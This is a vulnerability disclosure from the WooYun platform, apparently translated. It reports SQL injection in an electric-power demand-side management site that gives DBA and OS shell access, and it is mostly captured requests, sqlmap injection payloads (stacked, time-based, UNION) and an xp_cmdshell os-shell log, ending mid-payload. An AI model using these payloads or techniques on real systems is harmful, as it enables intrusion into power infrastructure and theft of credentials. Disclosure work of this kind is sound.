
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0144620

Title: SQL injection in an electric-power demand-side management platform (DBA privileges + plaintext weak passwords + os-shell + control of factory power consumption)

Related vendor: cncert (National Internet Emergency Center of China)

Author: 路人甲

Submitted: 2015-10-03 12:18

Fixed: 2015-11-26 08:30

Published: 2015-11-26 08:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-03: details sent to the vendor, awaiting vendor response
2015-10-12: vendor confirmed; details disclosed to the vendor only
2015-10-22: details disclosed to core white hats and domain experts
2015-11-01: details disclosed to regular white hats
2015-11-11: details disclosed to intern white hats
2015-11-26: details disclosed to the public

Brief description:

Following up on the earlier report by an expert: still not fixed! So after getting into the back end with the user name obtained, I tested it and found that the back-end search is also injectable. I did not test the other places that would modify data, for fear of causing problems.

Detailed description:

1. Injection point one:
Capture the request at the change-password page; the injection there is still unfixed and runs with DBA privileges. Through this injection point one can use --os-shell to add a system account directly and log in remotely, and also obtain the administrator password, log into the back end, and capture further requests.

**.**.**.**/DSM/ChangePassword.aspx (POST)
__VIEWSTATE=dDwxNzUwNzk0MzY3OztsPEltYWdlQnV0dG9uMTtJbWFnZUJ1dHRvbjI7Pj5k8fYbxBon4dOAVmaNHqj3BeGDzg%3D%3D&TextBox4=111111111&TextBox3=111111111&TextBox2=111111&TextBox1=admin&ImageButton1.x=42&ImageButton1.y=4


TextBox1 is injectable.

1.jpg


2.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: TextBox1
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=dDwxNzUwNzk0MzY3O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDIxPjs+O2w8dDxwPHA8bDxUZXh0Oz47bDzor7fmo4Dmn6XkvaDnmoTovpPlhaU7Pj47Pjs7Pjs+Pjs+PjtsPEltYWdlQnV0dG9uMTtJbWFnZUJ1dHRvbjI7Pj7WPS6PzC8FI1DnGD2ngOfj0n1v1g==&TextBox4=111111111&TextBox3=111111111&TextBox2=111111&TextBox1=admin'; WAITFOR DELAY '0:0:5'--&ImageButton1.x=42&ImageButton1.y=4
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=dDwxNzUwNzk0MzY3O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDIxPjs+O2w8dDxwPHA8bDxUZXh0Oz47bDzor7fmo4Dmn6XkvaDnmoTovpPlhaU7Pj47Pjs7Pjs+Pjs+PjtsPEltYWdlQnV0dG9uMTtJbWFnZUJ1dHRvbjI7Pj7WPS6PzC8FI1DnGD2ngOfj0n1v1g==&TextBox4=111111111&TextBox3=111111111&TextBox2=111111&TextBox1=admin' WAITFOR DELAY '0:0:5'--&ImageButton1.x=42&ImageButton1.y=4
---
[23:15:00] [INFO] testing Microsoft SQL Server
[23:15:00] [INFO] confirming Microsoft SQL Server
[23:15:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2008
[23:15:00] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[23:15:00] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[23:15:09] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[23:15:20] [INFO] adjusting time delay to 1 second due to good response times
[23:16:52] [ERROR] invalid character detected. retrying..
[23:16:52] [WARNING] increasing time delay to 2 seconds
C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\ERRORLOG
[23:24:57] [INFO] testing if current user is DBA
[23:24:59] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[23:25:02] [INFO] xp_cmdshell extended procedure is available
[23:25:03] [INFO] testing if xp_cmdshell extended procedure is usable
[23:25:25] [INFO] xp_cmdshell extended procedure is usable
[23:25:25] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[23:25:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[23:25:55] [INFO] retrieved: 2
[23:26:00] [INFO] retrieved: win-6kusom0elh7\administrator
[23:28:53] [ERROR] invalid character detected. retrying..
[23:28:53] [WARNING] increasing time delay to 3 seconds
[23:31:15] [INFO] retrieved:
command standard output: 'win-6kusom0elh7\administrator'
[23:33:55] [INFO] fetching current user
[23:33:55] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[23:33:55] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[23:34:04] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[23:34:15] [INFO] adjusting time delay to 1 second due to good response times
current user: 'sa'
[23:34:19] [INFO] fetching current database
[23:34:19] [INFO] retrieved: PowerV3
current database: 'PowerV3'
[23:34:55] [INFO] fetching server hostname
[23:34:55] [INFO] retrieved: WIN-6KUSOM0ELH7
hostname: 'WIN-6KUSOM0ELH7'
[23:35:59] [INFO] testing if current user is DBA
current user is DBA: True


database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa


available databases [7]:
[*] Collect_SH
[*] master
[*] model
[*] msdb
[*] power_wujiang
[*] PowerV3
[*] tempdb


Passwords are stored in plaintext, and many of the users have weak passwords. Did you think changing only the admin password would be enough? They need to be stored in protected form (salted hashes, not reversible plaintext), and every administrator should be told to change their password!

3.jpg


I won't repeat the privilege escalation via --os-shell; see Haswell's test process at
http://**.**.**.**/bugs/wooyun-2015-0123049
2. Injection point two:
Log into the back end with the administrator password obtained, and capture the request.

**.**.**.**/DSM/SelectEP.aspx (POST)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMTExMTI5MDY5O3Q8O2w8aTwxPjs
%2BO2w8dDw7bDxpPDM%2BO2k8ND47aTw1PjtpPDg%2BOz47bDx0PHQ8O3Q8aTw3PjtAPFxlO
%2BW4uOW3njvljZfkuqw76IuP5beeO%2BWkluW4gjvmlrDnloY75Lit5b%2BDOz47QDxcZTvluLjlt5475Y2X5LqsO%2BiLj
%2BW3njvlpJbluII75paw55aGO%2BS4reW/gzs%2BPjtsPGk8Mz47Pj47Oz47dDx0PDt0PGk8MTQ%2BO0A8bjvmtYvor5UyO
%2BW4uOeGnzvpq5jmlrDljLo75bel5Lia5Zut5Yy6O%2BWnkeiLj%2BWMujvmmIblsbE76IuP5beeO%2BiLj
%2BW3nuWTjeW6lDvlpKrku5M75ZC05rGfO%2BWQtOS4reWMujvnm7jln47ljLo75byg5a625rivOz47QDxuO%2Ba1i
%2BivlTI75bi454afO%2BmrmOaWsOWMujvlt6XkuJrlm63ljLo75aeR6IuP5Yy6O%2BaYhuWxsTvoi4/lt5476IuP5bee5ZON5bqUO
%2BWkquS7kzvlkLTmsZ875ZC05Lit5Yy6O%2BebuOWfjuWMujvlvKDlrrbmuK87Pj47bDxpPDEzPjs
%2BPjs7Pjt0PHQ8O3Q8aTwxPjtAPG47PjtAPG47Pj47Pjs7Pjt0PEAwPHA8cDxsPEl0ZW1Db3VudDs
%2BO2w8aTwtMT47Pj47PjtAMDxwPGw8c2VyQWN0aXZlQ2VsbFN0cmluZztzZXJBY3RpdmVSb3dTdHJpbmc7PjtsPDs7Pj47Ozs7O
zs7Ozs7Ozs7Ozs7Ozs7O0AwPDtsPEAwPHA8bDxLZXk7QmFzZVRhYmxlTmFtZTtBZGRCdXR0b25DYXB0aW9uOz47bDxcZTtcZTtcZ
Ts
%2BPjs7Ozs7Ozs7Ozs7OztAMDxsPFN5c3RlbS5VSW50NjQsIG1zY29ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9b
mV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTw0Mjk0OTY3Mjk1Pjs1MDwxPjs1MDwyPjs1MDwzPjs1MDw
0Pjs1MDw1Pjs1MDw2Pjs1MDw4NTg5OTM0NTkyPjs1MDw0Mjk0OTY3Mjk2Pjs1MDw2Pjs
%2BO2w8QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kOz47bDzkuIDnuqfljLrln5875LiA57qn5Yy65Z
%2BfO288dD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs%2BO2w85LiA57qn5Yy65Z
%2BfOz4%2BOzs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7PjtsPOS6jOe6p
%2BWMuuWfnzvkuoznuqfljLrln587bzx0Pjs%2BPjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkuoznuqfljLrln587Pj47Ozs
%2BOzs%2BO0AwPHA8bDxCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs%2BO2w85LiJ57qn5Yy65Z%2BfO%2BS4iee6p
%2BWMuuWfnztvPHQ%2BOz4%2BOzs7Ozs7QDA8cDxsPENhcHRpb247PjtsPOS4iee6p%2BWMuuWfnzs
%2BPjs7Oz47Oz47QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kO1dpZHRoOz47bDzkvIHkuJrnvJbnoIE75LyB5Lia57yW5
6CBO288dD47MTwzMjBweD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs
%2BO2w85LyB5Lia57yW56CBOz4%2BOzs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7V2lkdGg7PjtsP
OS8geS4muWQjeensDvkvIHkuJrlkI3np7A7bzx0PjsxPDMyMHB4Pjs
%2BPjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkvIHkuJrlkI3np7A7Pj47Ozs%2BOzs
%2BO0AwPHA8bDxEYXRhVHlwZTtCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs%2BO2w8U3lzdGVtLkludDY0O%2BWPl
%2BeUteWuuemHjzvlj5fnlLXlrrnph487bzx0Pjs%2BPjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzlj5fnlLXlrrnph487Pj47Ozs
%2BOzs%2BO0AwPHA8bDxLZXk7TnVsbFRleHQ7V2lkdGg7Q29sdW1uVHlwZTs
%2BO2w8dGVzdDvnlLXog73mnI3liqE7MTwxMjBweD47SW5mcmFnaXN0aWNzLldlYlVJLlVsdHJhV2ViR3JpZC5Db2x1bW5UeXBlLC
BJbmZyYWdpc3RpY3MuV2ViVUkuVWx0cmFXZWJHcmlkLnY0LjMsIFZlcnNpb249NC4zLjIwMDQzLjI3LCBDdWx0dXJlPW5ldXRyYW
wsIFB1YmxpY0tleVRva2VuPTdkZDVjMzE2M2YyY2QwY2I8QnV0dG9uPjs
%2BPjtwPGw8QmFja0NvbG9yO0JvcmRlclN0eWxlO0E7QjtGb3JlQ29sb3I7Rm9udF9TaXplO18hU0I7PjtsPDI8MjIwLCAyMjAsIDIyMD
47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5Cb3JkZXJTdHlsZSwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJl
PW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Tm9uZT47XGU7QkFDS0dST1VORC1QT1NJVElPTjogY2
VudGVyIGNlbnRlclw7QmFja2dyb3VuZC1yZXBlYXQ6bm8tcmVwZWF0OzI8Qmx1ZT47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5G
b250VW5pdCwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM
2Y1ZjdmMTFkNTBhM2E8OXB0PjtpPDExMDA
%2BOz4%2BO3A8bDxIb3Jpem9udGFsQWxpZ247QTtCO0ZvcmVDb2xvcjtfIVNCOz47bDxTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzL
khvcml6b250YWxBbGlnbiwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva
2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Q2VudGVyPjtcZTtCQUNLR1JPVU5ELVBPU0lUSU9OOiBjZW50ZXIgY2VudGVyXDtCYWNrZ3J
vdW5kLXJlcGVhdDpuby1yZXBlYXQ7MjxCbHVlPjtpPDQ%2BOz4%2BOzs7O0AwPHA8bDxDYXB0aW9uOz47bDxcZTs
%2BPjs7Oz47Oz47Pjs%2BOzs7Pjs%2BOz47Ozs7Oz47Pjs7Pjs%2BPjs
%2BPjtsPEltYWdlQnV0dG9uMTtVbHRyYVdlYkdyaWQxOz4%2BuUb0LvrCN4cUV%2BKhXy6k/koWSoo%3D&DropDownList2=%E8%8B%8F%E5%B7%9E&DropDownList3=%E5%BC%A0%E5%AE%B6%E6%B8%AF&DropDownList4=n&TextBox1=333&UltraWebGrid1=%253CDisplayLayout%253E%253CStateChanges%253E%253C/StateChanges%253E%253C/DisplayLayout%253E&ImageButton1.x=67&ImageButton1.y=13


This TextBox1 is injectable as well, again with DBA privileges.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: TextBox1
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMTExMTI5MDY5O3Q8O2w
8aTwxPjs+O2w8dDw7bDxpPDM+O2k8ND47aTw1PjtpPDg+Oz47bDx0PHQ8O3Q8aTw3PjtAPFxlO+W4uOW
3njvljZfkuqw76IuP5beeO+WkluW4gjvmlrDnloY75Lit5b+DOz47QDxcZTvluLjlt5475Y2X5LqsO+i
Lj+W3njvlpJbluII75paw55aGO+S4reW/gzs+PjtsPGk8Mz47Pj47Oz47dDx0PDt0PGk8MTQ+O0A8bjv
mtYvor5UyO+W4uOeGnzvpq5jmlrDljLo75bel5Lia5Zut5Yy6O+WnkeiLj+WMujvmmIblsbE76IuP5be
eO+iLj+W3nuWTjeW6lDvlpKrku5M75ZC05rGfO+WQtOS4reWMujvnm7jln47ljLo75byg5a625rivOz4
7QDxuO+a1i+ivlTI75bi454afO+mrmOaWsOWMujvlt6XkuJrlm63ljLo75aeR6IuP5Yy6O+aYhuWxsTv
oi4/lt5476IuP5bee5ZON5bqUO+WkquS7kzvlkLTmsZ875ZC05Lit5Yy6O+ebuOWfjuWMujvlvKDlrrb
muK87Pj47bDxpPDEzPjs+Pjs7Pjt0PHQ8O3Q8aTwxPjtAPG47PjtAPG47Pj47Pjs7Pjt0PEAwPHA8cDx
sPEl0ZW1Db3VudDs+O2w8aTwtMT47Pj47PjtAMDxwPGw8c2VyQWN0aXZlQ2VsbFN0cmluZztzZXJBY3R
pdmVSb3dTdHJpbmc7PjtsPDs7Pj47Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7O0AwPDtsPEAwPHA8bDxLZXk7QmF
zZVRhYmxlTmFtZTtBZGRCdXR0b25DYXB0aW9uOz47bDxcZTtcZTtcZTs+Pjs7Ozs7Ozs7Ozs7OztAMDx
sPFN5c3RlbS5VSW50NjQsIG1zY29ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJ
hbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTw0Mjk0OTY3Mjk1Pjs1MDwxPjs1MDwyPjs
1MDwzPjs1MDw0Pjs1MDw1Pjs1MDw2Pjs1MDw4NTg5OTM0NTkyPjs1MDw0Mjk0OTY3Mjk2Pjs1MDw2Pjs
+O2w8QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kOz47bDzkuIDnuqfljLrln5875LiA57q
n5Yy65Z+fO288dD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LiA57qn5Yy65Z+fOz4+Ozs7Pjs
7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7PjtsPOS6jOe6p+WMuuWfnzvkuoznuqf
ljLrln587bzx0Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkuoznuqfljLrln587Pj47Ozs+Ozs
+O0AwPHA8bDxCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs+O2w85LiJ57qn5Yy65Z+fO+S4iee6p+W
MuuWfnztvPHQ+Oz4+Ozs7Ozs7QDA8cDxsPENhcHRpb247PjtsPOS4iee6p+WMuuWfnzs+Pjs7Oz47Oz4
7QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kO1dpZHRoOz47bDzkvIHkuJrnvJbnoIE75Ly
B5Lia57yW56CBO288dD47MTwzMjBweD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LyB5Lia57y
W56CBOz4+Ozs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7V2lkdGg7PjtsPOS
8geS4muWQjeensDvkvIHkuJrlkI3np7A7bzx0PjsxPDMyMHB4Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9
uOz47bDzkvIHkuJrlkI3np7A7Pj47Ozs+Ozs+O0AwPHA8bDxEYXRhVHlwZTtCYXNlQ29sdW1uTmFtZTt
LZXk7SXNCb3VuZDs+O2w8U3lzdGVtLkludDY0O+WPl+eUteWuuemHjzvlj5fnlLXlrrnph487bzx0Pjs
+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzlj5fnlLXlrrnph487Pj47Ozs+Ozs+O0AwPHA8bDxLZXk
7TnVsbFRleHQ7V2lkdGg7Q29sdW1uVHlwZTs+O2w8dGVzdDvnlLXog73mnI3liqE7MTwxMjBweD47SW5
mcmFnaXN0aWNzLldlYlVJLlVsdHJhV2ViR3JpZC5Db2x1bW5UeXBlLCBJbmZyYWdpc3RpY3MuV2ViVUk
uVWx0cmFXZWJHcmlkLnY0LjMsIFZlcnNpb249NC4zLjIwMDQzLjI3LCBDdWx0dXJlPW5ldXRyYWwsIFB
1YmxpY0tleVRva2VuPTdkZDVjMzE2M2YyY2QwY2I8QnV0dG9uPjs+PjtwPGw8QmFja0NvbG9yO0JvcmR
lclN0eWxlO0E7QjtGb3JlQ29sb3I7Rm9udF9TaXplO18hU0I7PjtsPDI8MjIwLCAyMjAsIDIyMD47U3l
zdGVtLldlYi5VSS5XZWJDb250cm9scy5Cb3JkZXJTdHlsZSwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjA
uNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Tm9
uZT47XGU7QkFDS0dST1VORC1QT1NJVElPTjogY2VudGVyIGNlbnRlclw7QmFja2dyb3VuZC1yZXBlYXQ
6bm8tcmVwZWF0OzI8Qmx1ZT47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5Gb250VW5pdCwgU3lzdGV
tLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI
wM2Y1ZjdmMTFkNTBhM2E8OXB0PjtpPDExMDA+Oz4+O3A8bDxIb3Jpem9udGFsQWxpZ247QTtCO0ZvcmV
Db2xvcjtfIVNCOz47bDxTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLkhvcml6b250YWxBbGlnbiwgU3l
zdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2V
uPWIwM2Y1ZjdmMTFkNTBhM2E8Q2VudGVyPjtcZTtCQUNLR1JPVU5ELVBPU0lUSU9OOiBjZW50ZXIgY2V
udGVyXDtCYWNrZ3JvdW5kLXJlcGVhdDpuby1yZXBlYXQ7MjxCbHVlPjtpPDQ+Oz4+Ozs7O0AwPHA8bDx
DYXB0aW9uOz47bDxcZTs+Pjs7Oz47Oz47Pjs+Ozs7Pjs+Oz47Ozs7Oz47Pjs7Pjs+Pjs+PjtsPEltYWd
lQnV0dG9uMTtVbHRyYVdlYkdyaWQxOz4+uUb0LvrCN4cUV+KhXy6k/koWSoo=&DropDownList2=%E8%8B%8F%E5%B7%9E&DropDownList3=%E5%BC%A0%E5%AE%B6%E6%B8%AF&DropDownList4=n&TextBox1=333' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(110)+CHAR(117)+CHAR(113)+CHAR(88)+CHAR(77)+CHAR(112)+CHAR(79)+CHAR(122)+CHAR(86)+CHAR(71)+CHAR(73)+CHAR(106)+CHAR(67)+CHAR(113)+CHAR(99)+CHAR(99)+CHAR(104)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &UltraWebGrid1=%3CDisplayLayout%3E%3CStateChanges%3E%3C/StateChanges%3E%3C/DisplayLayout%3E&ImageButton1.x=67&ImageButton1.y=13
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMTExMTI5MDY5O3Q8O2w
8aTwxPjs+O2w8dDw7bDxpPDM+O2k8ND47aTw1PjtpPDg+Oz47bDx0PHQ8O3Q8aTw3PjtAPFxlO+W4uOW
3njvljZfkuqw76IuP5beeO+WkluW4gjvmlrDnloY75Lit5b+DOz47QDxcZTvluLjlt5475Y2X5LqsO+i
Lj+W3njvlpJbluII75paw55aGO+S4reW/gzs+PjtsPGk8Mz47Pj47Oz47dDx0PDt0PGk8MTQ+O0A8bjv
mtYvor5UyO+W4uOeGnzvpq5jmlrDljLo75bel5Lia5Zut5Yy6O+WnkeiLj+WMujvmmIblsbE76IuP5be
eO+iLj+W3nuWTjeW6lDvlpKrku5M75ZC05rGfO+WQtOS4reWMujvnm7jln47ljLo75byg5a625rivOz4
7QDxuO+a1i+ivlTI75bi454afO+mrmOaWsOWMujvlt6XkuJrlm63ljLo75aeR6IuP5Yy6O+aYhuWxsTv
oi4/lt5476IuP5bee5ZON5bqUO+WkquS7kzvlkLTmsZ875ZC05Lit5Yy6O+ebuOWfjuWMujvlvKDlrrb
muK87Pj47bDxpPDEzPjs+Pjs7Pjt0PHQ8O3Q8aTwxPjtAPG47PjtAPG47Pj47Pjs7Pjt0PEAwPHA8cDx
sPEl0ZW1Db3VudDs+O2w8aTwtMT47Pj47PjtAMDxwPGw8c2VyQWN0aXZlQ2VsbFN0cmluZztzZXJBY3R
pdmVSb3dTdHJpbmc7PjtsPDs7Pj47Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7O0AwPDtsPEAwPHA8bDxLZXk7QmF
zZVRhYmxlTmFtZTtBZGRCdXR0b25DYXB0aW9uOz47bDxcZTtcZTtcZTs+Pjs7Ozs7Ozs7Ozs7OztAMDx
sPFN5c3RlbS5VSW50NjQsIG1zY29ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJ
hbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTw0Mjk0OTY3Mjk1Pjs1MDwxPjs1MDwyPjs
1MDwzPjs1MDw0Pjs1MDw1Pjs1MDw2Pjs1MDw4NTg5OTM0NTkyPjs1MDw0Mjk0OTY3Mjk2Pjs1MDw2Pjs
+O2w8QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kOz47bDzkuIDnuqfljLrln5875LiA57q
n5Yy65Z+fO288dD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LiA57qn5Yy65Z+fOz4+Ozs7Pjs
7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7PjtsPOS6jOe6p+WMuuWfnzvkuoznuqf
ljLrln587bzx0Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzkuoznuqfljLrln587Pj47Ozs+Ozs
+O0AwPHA8bDxCYXNlQ29sdW1uTmFtZTtLZXk7SXNCb3VuZDs+O2w85LiJ57qn5Yy65Z+fO+S4iee6p+W
MuuWfnztvPHQ+Oz4+Ozs7Ozs7QDA8cDxsPENhcHRpb247PjtsPOS4iee6p+WMuuWfnzs+Pjs7Oz47Oz4
7QDA8cDxsPEJhc2VDb2x1bW5OYW1lO0tleTtJc0JvdW5kO1dpZHRoOz47bDzkvIHkuJrnvJbnoIE75Ly
B5Lia57yW56CBO288dD47MTwzMjBweD47Pj47Ozs7OztAMDxwPGw8Q2FwdGlvbjs+O2w85LyB5Lia57y
W56CBOz4+Ozs7Pjs7PjtAMDxwPGw8QmFzZUNvbHVtbk5hbWU7S2V5O0lzQm91bmQ7V2lkdGg7PjtsPOS
8geS4muWQjeensDvkvIHkuJrlkI3np7A7bzx0PjsxPDMyMHB4Pjs+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9
uOz47bDzkvIHkuJrlkI3np7A7Pj47Ozs+Ozs+O0AwPHA8bDxEYXRhVHlwZTtCYXNlQ29sdW1uTmFtZTt
LZXk7SXNCb3VuZDs+O2w8U3lzdGVtLkludDY0O+WPl+eUteWuuemHjzvlj5fnlLXlrrnph487bzx0Pjs
+Pjs7Ozs7O0AwPHA8bDxDYXB0aW9uOz47bDzlj5fnlLXlrrnph487Pj47Ozs+Ozs+O0AwPHA8bDxLZXk
7TnVsbFRleHQ7V2lkdGg7Q29sdW1uVHlwZTs+O2w8dGVzdDvnlLXog73mnI3liqE7MTwxMjBweD47SW5
mcmFnaXN0aWNzLldlYlVJLlVsdHJhV2ViR3JpZC5Db2x1bW5UeXBlLCBJbmZyYWdpc3RpY3MuV2ViVUk
uVWx0cmFXZWJHcmlkLnY0LjMsIFZlcnNpb249NC4zLjIwMDQzLjI3LCBDdWx0dXJlPW5ldXRyYWwsIFB
1YmxpY0tleVRva2VuPTdkZDVjMzE2M2YyY2QwY2I8QnV0dG9uPjs+PjtwPGw8QmFja0NvbG9yO0JvcmR
lclN0eWxlO0E7QjtGb3JlQ29sb3I7Rm9udF9TaXplO18hU0I7PjtsPDI8MjIwLCAyMjAsIDIyMD47U3l
zdGVtLldlYi5VSS5XZWJDb250cm9scy5Cb3JkZXJTdHlsZSwgU3lzdGVtLldlYiwgVmVyc2lvbj0xLjA
uNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2E8Tm9
uZT47XGU7QkFDS0dST1VORC1QT1NJVElPTjogY2VudGVyIGNlbnRlclw7QmFja2dyb3VuZC1yZXBlYXQ
6bm8tcmVwZWF0OzI8Qmx1ZT47U3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5Gb250VW5pdCwgU3lzdGV
tLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI
wM2Y1ZjdmMTFkNTBhM2E8OXB0PjtpPDExMDA+Oz4+O3A8bDxIb3Jpem9udGFsQWxpZ247QTtCO0ZvcmV
Db2xvcjtfIVNCOz47bDxTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLkhvcml6b250YWxBbGlnbiwgU3l
zdGVtLldlYiwgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2V
uPWIwM2Y1ZjdmMTFkNTBhM2E8Q2VudGVyPjtcZTtCQUNLR1JPVU5ELVBPU0lUSU9OOiBjZW50ZXIgY2V
udGVyXDtCYWNrZ3JvdW5kLXJlcGVhdDpuby1yZXBlYXQ7MjxCbHVlPjtpPDQ+Oz4+Ozs7O0AwPHA8bDx
DYXB0aW9uOz47bDxcZTs+Pjs7Oz47Oz47Pjs+Ozs7Pjs+Oz47Ozs7Oz47Pjs7Pjs+Pjs+PjtsPEltYWd
lQnV0dG9uMTtVbHRyYVdlYkdyaWQxOz4+uUb0LvrCN4cUV+KhXy6k/koWSoo=&DropDownList2=%E8%8B%8F%E5%B7%9E&DropDownList3=%E5%BC%A0%E5%AE%B6%E6%B8%AF&DropDownList4=n&TextBox1=333'; WAITFOR DELAY '0:0:5'--&UltraWebGrid1=%3CDisplayLayout%3E%3CStateChanges%3E%3C/StateChanges%3E%3C/DisplayLayout%3E&ImageButton1.x=67&ImageButton1.y=13
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxMTExMTI5MDY5O3Q8O2w
8aTwxPjs+O2w8dDw7bDxpPDM+O2k8ND47aTw1PjtpPDg+Oz47bDx0PHQ8O3Q8aTw3PjtAPFxlO+W4uOW
3njvljZfkuqw76IuP5beeO+WkluW4gjvmlrDnloY75Lit5b+DOz47QDxcZTvluLjlt5475Y2X5LqsO+i
Lj+W3njvlpJbluII75paw55aGO+S4reW/gzs+PjtsPGk8Mz47Pj47Oz47dDx0PDt0PGk8MTQ+O0A8bjv
